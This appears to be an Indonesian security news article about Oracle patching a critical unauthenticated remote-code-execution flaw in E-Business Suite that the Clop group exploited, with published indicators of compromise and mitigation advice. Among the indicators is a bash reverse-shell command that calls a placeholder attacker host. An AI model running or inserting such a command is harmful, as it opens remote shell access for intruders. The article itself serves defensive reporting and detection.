Security

Oracle Tambal Zero-Day Kritis di E-Business Suite yang Dieksploitasi dalam Serangan Data Theft Clop

Oracle merilis pembaruan darurat untuk menambal kerentanan zero-day kritis (CVE-2025-61882) di Oracle E-Business Suite (EBS) yang dieksploitasi oleh kelompok ransomware Clop dalam serangan pencurian data berskala besar pada Agustus 2025.

Kerentanan Kritis Tanpa Autentikasi

Celah ini berada pada komponen Oracle Concurrent Processing (BI Publisher Integration) di EBS versi 12.2.3 hingga 12.2.14, dan memiliki skor CVSS 9.8 — menandakan tingkat keparahan tertinggi.
Kerentanan memungkinkan Remote Code Execution (RCE) tanpa autentikasi, artinya penyerang dapat mengeksekusi perintah jarak jauh tanpa memerlukan nama pengguna maupun kata sandi.

“Celah ini dapat dieksploitasi melalui jaringan tanpa autentikasi dan memungkinkan penyerang menjalankan kode berbahaya di sistem target,” tulis Oracle dalam security alert terbarunya.

Untuk menginstal tambalan ini, pelanggan wajib lebih dahulu menerapkan Critical Patch Update (CPU) Oktober 2023, sebelum memperbarui ke versi terbaru yang menutup CVE-2025-61882.

Dikaitkan Langsung dengan Kampanye Clop

Konfirmasi eksploitasi datang dari Charles Carmakal, CTO Mandiant (Google Cloud), yang menyebut bahwa Clop memanfaatkan beberapa celah EBS, termasuk CVE-2025-61882, untuk mencuri data dari sejumlah organisasi.
Serangan tersebut berlangsung pada Agustus 2025, bersamaan dengan kampanye pemerasan baru Clop yang mengirimkan email ancaman kepada korban:

“Kami telah membobol aplikasi Oracle E-Business Suite Anda dan menyalin banyak dokumen. Semua file dan informasi pribadi kini berada di server kami,” tulis Clop dalam pesan yang dibagikan ke media.

Oracle kemudian merilis Indicators of Compromise (IOCs) yang menegaskan hubungan langsung antara exploit yang digunakan Clop dan file yang bocor oleh grup Scattered Lapsus$ Hunters di Telegram.

Eksploit Bocor ke Publik

Grup Scattered Lapsus$ Hunters — gabungan penyerang dari Scattered Spider, Lapsus$, dan ShinyHunters — membagikan arsip berjudul:

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip

Isi arsip tersebut mencakup:

  • exp.py – skrip eksploitasi untuk menjalankan perintah arbitrer.
  • server.py – skrip pembuka reverse shell ke server penyerang.
  • readme.md – instruksi penggunaan eksploit.

Oracle memastikan arsip ini adalah eksploit yang sama digunakan Clop dalam serangan EBS.

Indikator Kompromi (IOC) yang Diterbitkan Oracle

Oracle merilis rincian teknis berikut untuk membantu deteksi:

  • IP terlibat:
    • 200[.]107[.]207[.]26
    • 185[.]181[.]60[.]11
  • Perintah eksploit: sh -c /bin/bash -i >& /dev/tcp/<ip_attacker>/0>&1
  • Hash file exploit:
    • 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
    • aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
    • 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b

Pola Serangan Clop yang Berulang

Clop dikenal sebagai salah satu kelompok yang secara konsisten mengeksploitasi zero-day dalam kampanye pencurian data besar, termasuk:

  • 2020: Accellion FTA – hampir 100 organisasi terdampak.
  • 2021: SolarWinds Serv-U FTP.
  • 2023: GoAnywhere MFT dan MOVEit Transfer – lebih dari 2.700 organisasi diretas.
  • 2024: Dua zero-day Cleo MFT (CVE-2024-50623 & CVE-2024-55956).

Serangan terhadap Oracle EBS kini menjadi bab terbaru dalam deretan panjang eksploitasi zero-day oleh Clop.

Tindakan Mitigasi

Oracle dan pakar keamanan menyarankan langkah berikut:

  1. Segera instal tambalan keamanan terbaru setelah CPU Oktober 2023.
  2. Blokir akses eksternal ke endpoint EBS yang menggunakan komponen BI Publisher Integration.
  3. Periksa log jaringan dan aplikasi untuk aktivitas dari IP atau hash di atas.
  4. Pantau sistem untuk tanda-tanda reverse shell dan aktivitas tak sah dari akun Oracle EBS.
  5. Gunakan WAF dan segmentasi jaringan untuk membatasi eksposur antarmuka web Oracle.

Serangan ini mempertegas risiko tinggi pada sistem ERP dan aplikasi enterprise yang belum ditambal — sekaligus menyoroti pentingnya kontrol keamanan berlapis dalam melindungi data bisnis bernilai tinggi.


Sumber: BleepingComputer

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button